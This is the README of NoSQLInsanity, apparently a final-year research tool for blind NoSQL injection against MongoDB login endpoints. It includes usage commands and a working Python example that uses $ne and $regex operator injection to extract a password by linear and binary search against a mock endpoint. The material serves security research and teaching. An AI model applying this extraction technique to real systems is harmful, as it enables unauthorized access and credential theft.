💉 NoSQLInsanity
This tool was developed as research for a final year project.
NoSQLInsanity: Tool for Security Assessment of NoSQL
Wireframe
https://whimsical.com/nosqlinsanity-F2thpyebcaNPyCQr4UBabe
Researcher : Roby Firnando Yusuf aka greycat aka 0x00b0
Supervisor : Daniel Rudiaman S. S.T., M. Kom
Installation
It's fairly simple to install NoSQLInsanity:
from Source
Clone repository and install requirements:
$ git clone https://github.com/robyfirnandoyusuf/NoSQLInsanity.git
$ cd NoSQLInsanity/
$ pip3 install -r requirements.txt
from Docker
Pull the Docker image by running:
$ docker pull robyfirnando/nosqlinsanity:v2.0.1
from PyPi
Coming Soon
Usage
The simplest invocation:
# from source
$ python3 NoSQLInsanity.py --url "https://lab.s.he-left.me/auth/login" --platform "mongodb"
# from docker
$ docker run -it robyfirnando/nosqlinsanity:v2.0.1 --url "https://lab.s.he-left.me/auth/login" --platform "mongodb"
Options
Here are the options it supports (`--platform` is shown in the usage above and is listed here for completeness).
| Argument | Description |
|---|---|
| --url | Vulnerable endpoint |
| --platform | Target NoSQL platform (e.g. mongodb) |
| -s, --silent | Silent mode (hide the time measurements) |
Features
- Dump by known value (extract a field from the document matching a value you already know, e.g. a username)
- Dump by unknown value (dump all documents by specifying a field)
- Choice of extraction algorithm (linear search or binary search)
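The following is an added example, not NoSQLInsanity's own code, showing what the two extraction algorithms above do in a blind NoSQL injection. It runs against a constructed in-memory stand-in for a MongoDB login endpoint that passes the JSON body straight into the query (so `$ne` and `$regex` operators are honoured); the `users` collection contents, the `login` oracle, the `ALPHABET` and the `admin` username are assumptions made for this demo. Both engines first recover the field length, then recover it character by character: linear search probes one `^prefix<char>` regex per alphabet symbol, binary search probes `^prefix[<half of alphabet>]` character classes and halves the candidate set each time.

```python
"""Added example (not NoSQLInsanity's code): blind NoSQL injection extraction,
linear vs. binary search, against a constructed stand-in login endpoint."""
import re
import string

# Constructed sample collection standing in for the target's `users` collection.
USERS = [
    {"username": "admin", "password": "s3cr3t!Pa"},
    {"username": "guest", "password": "guest"},
]
REQUESTS = {"count": 0}  # counts probes so the two engines can be compared

# Assumed search alphabet; a real target may need a wider one.
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def login(body: dict) -> bool:
    """Stand-in for the vulnerable /auth/login handler: the request body is
    used as the query filter, so operator objects are evaluated. True = 200."""
    REQUESTS["count"] += 1

    def match(doc_value, cond):
        if isinstance(cond, dict):
            if "$regex" in cond:
                return re.search(cond["$regex"], doc_value) is not None
            if "$ne" in cond:
                return doc_value != cond["$ne"]
            raise ValueError("unsupported operator in demo")
        return doc_value == cond

    return any(all(match(doc.get(k, ""), v) for k, v in body.items()) for doc in USERS)


def vuln_test() -> bool:
    """Classic operator-injection check: {"$ne": ""} on both fields logs in."""
    return login({"username": {"$ne": ""}, "password": {"$ne": ""}})


def oracle(field: str, regex: str, user: str = "admin") -> bool:
    """One boolean probe: does `user`'s `field` match `regex`?"""
    return login({"username": user, field: {"$regex": regex}})


def length_linear(field, user="admin", limit=64):
    for n in range(1, limit + 1):                  # one probe per candidate length
        if oracle(field, r"^.{%d}$" % n, user):
            return n
    return None


def length_binary(field, user="admin", limit=64):
    lo, hi = 1, limit
    if not oracle(field, r"^.{%d,%d}$" % (lo, hi), user):
        return None
    while lo < hi:                                 # halve the length interval
        mid = (lo + hi) // 2
        if oracle(field, r"^.{%d,%d}$" % (lo, mid), user):
            hi = mid
        else:
            lo = mid + 1
    return lo


def dump_linear(field, user="admin"):
    found = ""
    for _ in range(length_linear(field, user)):
        for ch in ALPHABET:                        # up to |ALPHABET| probes per char
            if oracle(field, "^" + re.escape(found + ch), user):
                found += ch
                break
        else:
            raise RuntimeError("character outside ALPHABET")
    return found


def dump_binary(field, user="admin"):
    found = ""
    for _ in range(length_binary(field, user)):
        lo, hi = 0, len(ALPHABET) - 1
        while lo < hi:                             # ~log2(|ALPHABET|) probes per char
            mid = (lo + hi) // 2
            cls = "[" + "".join(re.escape(c) for c in ALPHABET[lo:mid + 1]) + "]"
            if oracle(field, "^" + re.escape(found) + cls, user):
                hi = mid
            else:
                lo = mid + 1
        if not oracle(field, "^" + re.escape(found + ALPHABET[lo]), user):
            raise RuntimeError("character outside ALPHABET")
        found += ALPHABET[lo]
    return found


def compare(field="password", user="admin"):
    """Run both engines and return {name: (value, request_count)}."""
    results = {}
    for name, engine in (("linear", dump_linear), ("binary", dump_binary)):
        REQUESTS["count"] = 0
        results[name] = (engine(field, user), REQUESTS["count"])
    return results


if __name__ == "__main__":
    print("vulnerable:", vuln_test())
    print(compare())
```

Running `compare()` recovers the same value with both engines; the binary engine needs a small fraction of the requests, which is the whole reason for offering it alongside linear search. The final `^prefix<char>` probe in `dump_binary` is deliberate: a character class search always converges on some index, so without it a character outside the assumed alphabet would be silently misreported.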
License
NoSQLInsanity is distributed under the Apache License 2.0.
Acknowledgments
Since this tool includes some contributions, and I'm not an asshole, I'll publicly thank the following users for their support, help and resources:
- Daniel Lu aka BrownieInMotion (DiceGang - Redpwn)
- Fernanda Darmasaputra (Tim Petir - OurLastNight)
- Pavel Sorokin (BI.ZONE Security Researcher)
- and You
TODO:
- Print Info
- Menu Param
- Menu HTTP Method
- Menu Input Payload
- Engine: check whether the target website is up or down
- Engine Vuln Test
- Auto Set Success-Identifier
- Engine Linear (Dump known value)
- Engine Linear (Dump unknown value)
- Engine Linear Count Length
- Engine Binary Search (Dump known value)
- Engine Binary Search (Dump unknown value)
- Engine BinSearch Count Length
- Research MongoDB's ability to support BinSearch
- Add measurement each chars LinearSearch (Dump known value)
- Add measurement each chars LinearSearch (Dump unknown value)
- Add measurement each chars BinSearch (Dump known value)
- Add measurement each chars BinSearch (Dump unknown value)
- Log Report CSV